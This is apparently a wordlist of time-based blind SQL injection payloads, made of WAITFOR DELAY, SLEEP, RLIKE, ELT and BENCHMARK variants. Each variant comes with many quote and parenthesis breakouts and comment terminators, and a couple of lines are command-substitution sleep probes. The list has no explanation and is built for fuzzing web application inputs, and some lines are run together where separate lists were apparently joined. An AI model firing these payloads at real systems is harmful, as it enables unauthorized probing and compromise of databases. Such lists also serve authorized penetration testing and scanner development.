waitfor delay '0:0:10'--
;waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") IF (1=1) WAITFOR DELAY '0:0:10'--
';%5waitfor%5delay%5'0:0:10'%5--%5
' WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '0:0:10'
or WAITFOR DELAY '0:0:10'--
or WAITFOR DELAY '0:0:10'
and WAITFOR DELAY '0:0:10'--
and WAITFOR DELAY '0:0:10'
WAITFOR DELAY '0:0:10'
;WAITFOR DELAY '0:0:10'--
;WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'--
1 WAITFOR DELAY '0:0:10'
1 WAITFOR DELAY '0:0:10'-- 1337
1' WAITFOR DELAY '0:0:10' AND '1337'='1337
1') WAITFOR DELAY '0:0:10' AND ('1337'='1337
1) WAITFOR DELAY '0:0:10' AND (1337=1337
' WAITFOR DELAY '0:0:10'--
" WAITFOR DELAY '0:0:10'--
')) WAITFOR DELAY '0:0:10'--
'))) WAITFOR DELAY '0:0:10'--
%' WAITFOR DELAY '0:0:10'--
") WAITFOR DELAY '0:0:10'--
")) WAITFOR DELAY '0:0:10'--
"))) WAITFOR DELAY '0:0:10'--
1 waitfor delay '0:0:10'--
1' waitfor delay '0:0:10'--
1 and sleep(10)--
1 and sleep(10)
1 and sleep(10)--
1 and sleep(10)
' and sleep(10)--
' and sleep(10)
' and sleep(10) and '1'='1
' and sleep(10) and '1'='1
' and sleep(10)--
' and sleep(10)
' AnD SLEEP(10) ANd '1
and sleep(10)--
and sleep(10)
and sleep(10)--
and sleep(10)
and SELECT SLEEP(10); #
AnD SLEEP(10)
AnD SLEEP(10)--
AnD SLEEP(10)#
' AND SLEEP(10)#
" AND SLEEP(10)#
') AND SLEEP(10)#
or sleep(10)--
or sleep(10)
or sleep(10)--
or sleep(10)
or SELECT SLEEP(10); #
or SLEEP(10)
or SLEEP(10)#
or SLEEP(10)--
or SLEEP(10)="
or SLEEP(10)='
' OR SLEEP(10)#
" OR SLEEP(10)#
') OR SLEEP(10)#
')) or sleep(10)='
" or sleep(10)#
1) or sleep(10)#
)) or sleep(10)='
1)) or sleep(10)#
or sleep(10)#
%20'sleep%2010'
%20$(sleep%2010)
")) or sleep(10)="
or sleep(10)='
") or sleep(10)="
) or sleep(10)='
1 OR sleep(10)#1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337RLIKE SLEEP(5)--
' RLIKE SLEEP(10)--
' RLIKE SLEEP(10)-- 1337
" RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10) AND ('1337'='1337
')) RLIKE SLEEP(10) AND (('1337'='1337
'))) RLIKE SLEEP(10) AND ((('1337'='1337
) RLIKE SLEEP(10)-- 1337
) RLIKE SLEEP(10) AND (1337=1337
)) RLIKE SLEEP(10) AND ((1337=1337
))) RLIKE SLEEP(10) AND (((1337=1337
1 RLIKE SLEEP(10)
1 RLIKE SLEEP(10)-- 1337
1 RLIKE SLEEP(10)# 1337
1 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(10))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' RLIKE SLEEP(10) AND '1337'='1337
') RLIKE SLEEP(10) AND ('1337' LIKE '1337
')) RLIKE SLEEP(10) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(10) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(10) AND '1337%'='1337
' RLIKE SLEEP(10) AND '1337' LIKE '1337
") RLIKE SLEEP(10) AND ("1337"="1337
")) RLIKE SLEEP(10) AND (("1337"="1337
"))) RLIKE SLEEP(10) AND ((("1337"="1337
" RLIKE SLEEP(10) AND "1337"="1337
") RLIKE SLEEP(10) AND ("1337" LIKE "1337
")) RLIKE SLEEP(10) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(10) AND ((("1337" LIKE "1337
" RLIKE SLEEP(10) AND "1337" LIKE "1337
' RLIKE SLEEP(10) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' AND ELT(1337=1337,SLEEP(10))--
' AND ELT(1337=1337,SLEEP(10))-- 1337
" AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(10))-- 1337
) AND ELT(1337=1337,SLEEP(10)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(10)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(10)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(10))
1 AND ELT(1337=1337,SLEEP(10))-- 1337
1 AND ELT(1337=1337,SLEEP(10))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(10)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))|[1
%' AND ELT(1337=1337,SLEEP(10)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(10)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '134')
